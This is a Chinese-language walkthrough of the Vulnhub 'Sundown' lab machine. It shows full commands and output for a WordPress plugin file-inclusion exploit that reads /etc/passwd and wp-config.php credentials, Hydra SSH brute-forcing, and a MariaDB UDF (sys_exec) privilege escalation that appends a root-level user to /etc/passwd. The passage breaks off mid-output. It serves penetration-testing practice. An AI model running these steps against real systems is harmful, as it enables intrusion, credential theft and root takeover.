首页 > 其他分享 >Vulnhub Sundown靶机解题过程

Vulnhub Sundown靶机解题过程

时间:2022-11-12 22:45:21浏览次数:36  
标签:sbin Sundown nologin 192.168 usr wp 靶机 root Vulnhub

Sundown

识别目标主机IP地址

──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                                 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                
 192.168.56.100  08:00:27:f8:c9:80      1      60  PCS Systemtechnik GmbH                                                                                                                                                        
 192.168.56.173  08:00:27:a9:1b:c1      1      60  PCS Systemtechnik GmbH                     

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.173

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.173 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 08:31 EST
Nmap scan report for bogon (192.168.56.173)
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 90:ba:81:81:b6:ec:5b:33:87:f8:73:3d:82:ca:e5:dd (RSA)
|   256 e1:bd:70:79:91:22:86:c8:e1:f5:80:ed:4a:b7:dd:ad (ECDSA)
|_  256 9f:03:af:27:89:8a:8e:b5:c0:68:05:44:74:d3:6b:d7 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-title: Sundown – Just another WordPress site
MAC Address: 08:00:27:A9:1B:C1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.98 seconds

目标主机有两个开放端口22(SSH)、80(HTTP)

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ curl http://192.168.56.173/robots.txt
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ wpscan --url http://192.168.56.173 -e u,p                                                
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.173/ [192.168.56.173]
[+] Started: Sat Nov 12 08:37:30 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.56.173/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.173/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.173/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.173/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.173/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.173/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://192.168.56.173/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.56.173/wp-content/themes/twentynineteen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://192.168.56.173/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://192.168.56.173/wp-content/themes/twentynineteen/style.css?ver=1.5
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.173/wp-content/themes/twentynineteen/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-with-spritz
 | Location: http://192.168.56.173/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.173/wp-content/plugins/wp-with-spritz/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.173/wp-json/wp/v2/users/?per_page=100&page=1
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Nov 12 08:37:33 2022
[+] Requests Done: 52
[+] Cached Requests: 8
[+] Data Sent: 13.283 KB
[+] Data Received: 361.348 KB
[+] Memory used: 235.969 MB
[+] Elapsed time: 00:00:03
                                                  

发现了用户名admin,看能不能破解其密码:

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ wpscan --url http://192.168.56.173 -U admin -P /usr/share/wordlists/rockyou.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.173/ [192.168.56.173]
[+] Started: Sat Nov 12 08:37:59 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.56.173/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.173/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.173/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.173/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.173/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.173/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://192.168.56.173/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.56.173/wp-content/themes/twentynineteen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://192.168.56.173/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://192.168.56.173/wp-content/themes/twentynineteen/style.css?ver=1.5
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.173/wp-content/themes/twentynineteen/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-with-spritz
 | Location: http://192.168.56.173/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.173/wp-content/plugins/wp-with-spritz/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <===================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
^CTrying admin / KEVIN1 Time: 00:04:47 <                                                                                                                                                  > (43280 / 14344392)  0.30%  ETA: 26:21:^Cying admin / skittle1 Time: 00:04:49 <                                                                                                                                                > (43645 / 14344392)  0.30%  ETA: 26:20:43
[i] No Valid Passwords Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.                                                                                                      > (43650 / 14344392)  0.30%  ETA: 26:20:42
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Nov 12 08:42:53 2022
[+] Requests Done: 43797
[+] Cached Requests: 39
[+] Data Sent: 22.229 MB
[+] Data Received: 25.742 MB
[+] Memory used: 257.387 MB
[+] Elapsed time: 00:04:54

Scan Aborted: Canceled by User
                                                          

没有破解成功,但是注意到wpscan扫描出来一个插件wp-with-spritz

查找一下有无漏洞?

https://www.exploit-db.com/exploits/44544
1. Version Disclosure

/wp-content/plugins/wp-with-spritz/readme.txt

2. Source Code

if(isset($_GET['url'])){
$content=file_get_contents($_GET['url']);

3. Proof of Concept

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

该插件存在文件包含漏洞:

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ curl http://192.168.56.173/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
carlos:x:1000:1000:carlos,,,:/home/carlos:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mysql:x:0:0:MySQL Server,,,:/nonexistent:/bin/false

发现存在用户carlos,看有没有私钥

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ curl http://192.168.56.173/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//home/carlos/.ssh/id_rsam

没有收获,尝试ssh登录carlos

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ hydra -l carlos -P /usr/share/wordlists/rockyou.txt 192.168.56.173 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-12 08:50:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.173:22/
[22][ssh] host: 192.168.56.173   login: carlos   password: carlos
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-12 08:51:08

利用hydra工具破解用户carlos的密码: carlos

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ ssh [email protected]                                  
The authenticity of host '192.168.56.173 (192.168.56.173)' can't be established.
ED25519 key fingerprint is SHA256:LrAN6VcuvH1BM5LTmD54ngGS/pZZXNvsATpRvEIuwhg.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.173' (ED25519) to the list of known hosts.
[email protected]'s password: 
Linux sundown 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Aug  3 19:39:26 2020 from 192.168.100.139
carlos@sundown:~$ id
uid=1000(carlos) gid=1000(carlos) groups=1000(carlos),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)

成功拿到了carlos的shell

提权

将linpeas.sh脚本上传至目标主机,修改权限,并执行

没有太大收获,有点值得注意,mysql竟然是草鸡用户

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                                                                                                                                                                                   
mysql:x:0:0:MySQL Server,,,:/nonexistent:/bin/false

而且竟然无法读取wp-config.php

carlos@sundown:/var/www/html/wordpress$ ls -alh wp-config.php 
-rw-r----- 1 www-data www-data 3.3K Aug  3  2020 wp-config.php

但事实上我们可以利用文件包含漏洞(前面读取/etc/passwd文件)读取该文件:

┌──(kali㉿kali)-[~/Vulnhub/Sundown]
└─$ curl http://192.168.56.173/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//var/www/html/wordpress/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'root' );

/** MySQL database password */
define( 'DB_PASSWORD', 'VjFSQ2IyRnNUak5pZWpCTENnPT0K' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define( 'WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] );
define( 'WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] );
define( 'WP_HTTP_BLOCK_EXTERNAL', true);

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'Ki6(+lcPzEIJZr++d}5b=k]ve+=qj+^iV#4=-@Ir>N7]`am^ir-?h*rgL*O1=eW|');
define('SECURE_AUTH_KEY',  'F{1rBAEK#q_QUSGUJ`PkH}N%&m27mE8=5xc+P$n`3g9#]X59#!pkE(Kz-OGa!CzU');
define('LOGGED_IN_KEY',    'e.s%#mQ$#MMrKG3jf@6jAx[d}A7rODFO&|Y1|@->3KShCg<z }o5M*:j#1G2Am9;');
define('NONCE_KEY',        '$|Vq+u:J-+GY^0&zk2.JNp}-/rjCyyEjeZ/:UdqHM?INN*,V|-*yp1@IYjc8<MYI');
define('AUTH_SALT',        'Oa2[X]i$+>XTA?j|1EDScmJ_4jXA),J5t0[B8uhcI- vhbXELvF?bR:Mszjgx1gS');
define('SECURE_AUTH_SALT', 'F9A.5/`YNxdr3<PMz0[Vj`-aL`vUQ <pT$JF(KZ2,c7IJ)cEL+SgFYbvf]KQO|F+');
define('LOGGED_IN_SALT',   'W4H:NhcaynZCD-1}/1.N&O4t<oO-YKbkqPgIk_Zi#$>;ANIvjLA}=]6QG:Sr#J1=');
define('NONCE_SALT',       '7GU.TppPZCBb,Aebxjb9*$cP/x *3&iSN$`?f&L(*%cI7}LfBGyBz=A^[QxuW;tB');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

这里有数据库的用户名(root)和密码,但这是也是系统的root密码呢?结果是失败的,但是可以进入到数据库看一下

从网上下载lib_mysqludf_sys_64.so文件,将该文件上传到目标站点

carlos@sundown:/var/www/html/wordpress$ cd /tmp
carlos@sundown:/tmp$ curl http://192.168.56.137:8000/lib_mysqludf_sys_64.so -O
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  8040  100  8040    0     0   713k      0 --:--:-- --:--:-- --:--:--  713k
carlos@sundown:/tmp$ ls
lib_mysqludf_sys_64.so  linpeas.sh  systemd-private-43c4c00ed9944d5da4ba9dd69d04d655-apache2.service-TfZ0pc  systemd-private-43c4c00ed9944d5da4ba9dd69d04d655-systemd-timesyncd.service-XFeS9G

carlos@sundown:/var/www/html/wordpress$ mysql -uroot -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 69132
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress_db       |
+--------------------+
4 rows in set (0.002 sec)

MariaDB [(none)]> 
MariaDB [(none)]> quit
Bye
carlos@sundown:/var/www/html/wordpress$ cd /tmp
carlos@sundown:/tmp$ curl http://192.168.56.137:8000/lib_mysqludf_sys_64.so -O
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  8040  100  8040    0     0   713k      0 --:--:-- --:--:-- --:--:--  713k
carlos@sundown:/tmp$ ls
lib_mysqludf_sys_64.so  linpeas.sh  systemd-private-43c4c00ed9944d5da4ba9dd69d04d655-apache2.service-TfZ0pc  systemd-private-43c4c00ed9944d5da4ba9dd69d04d655-systemd-timesyncd.service-XFeS9G
carlos@sundown:/tmp$ mysql -uroot -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 69133
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name   | Value                                       |
+-----------------+---------------------------------------------+
| plugin_dir      | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma                                       |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> create table potato(line blob);
ERROR 1046 (3D000): No database selected
MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mysql]> create table potato(line blob);
Query OK, 0 rows affected (0.014 sec)

MariaDB [mysql]> insert into potato values(load_file(‘/tmp/lib_mysqludf_sys_64.so’));
ERROR 1054 (42S22): Unknown column '‘' in 'field list'
MariaDB [mysql]> insert into potato values(load_file('/tmp/lib_mysqludf_sys_64.so'));
Query OK, 1 row affected (0.003 sec)

MariaDB [mysql]> SHOW VARIABLES LIKE ‘%plugin%’;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '‘%plugin%’' at line 1
MariaDB [mysql]> SHOW VARIABLES LIKE '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name   | Value                                       |
+-----------------+---------------------------------------------+
| plugin_dir      | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma                                       |
+-----------------+---------------------------------------------+
2 rows in set (0.000 sec)

MariaDB [mysql]> select * from potato into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_64.so';
Query OK, 1 row affected (0.000 sec)

MariaDB [mysql]> create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
Query OK, 0 rows affected (0.000 sec)

MariaDB [mysql]> select sys_exec(‘echo “Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd’);
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ':ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd’)' at line 1
MariaDB [mysql]> select sys_exec('echo “Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd');
+---------------------------------------------------------------------------------------------+
| sys_exec('echo “Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd')     |
+---------------------------------------------------------------------------------------------+
|                                                                                           0 |
+---------------------------------------------------------------------------------------------+
1 row in set (0.001 sec)

MariaDB [mysql]> quit
Bye
carlos@sundown:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
carlos:x:1000:1000:carlos,,,:/home/carlos:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mysql:x:0:0:MySQL Server,,,:/nonexistent:/bin/false
“Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash”
carlos@sundown:/tmp$ su - Dave
su: user Dave does not exist
carlos@sundown:/tmp$ mysql -uroot -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 69134
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mysql]> select sys_exec(‘echo “Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd’);
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ':ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash” >> /etc/passwd’)' at line 1
MariaDB [mysql]> select sys_exec('echo "Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd');
+-----------------------------------------------------------------------------------------+
| sys_exec('echo "Dave:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd') |
+-----------------------------------------------------------------------------------------+
|                                                                                       0 |
+-----------------------------------------------------------------------------------------+
1 row in set (0.001 sec)

MariaDB [mysql]> quit
Bye
carlos@sundown:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
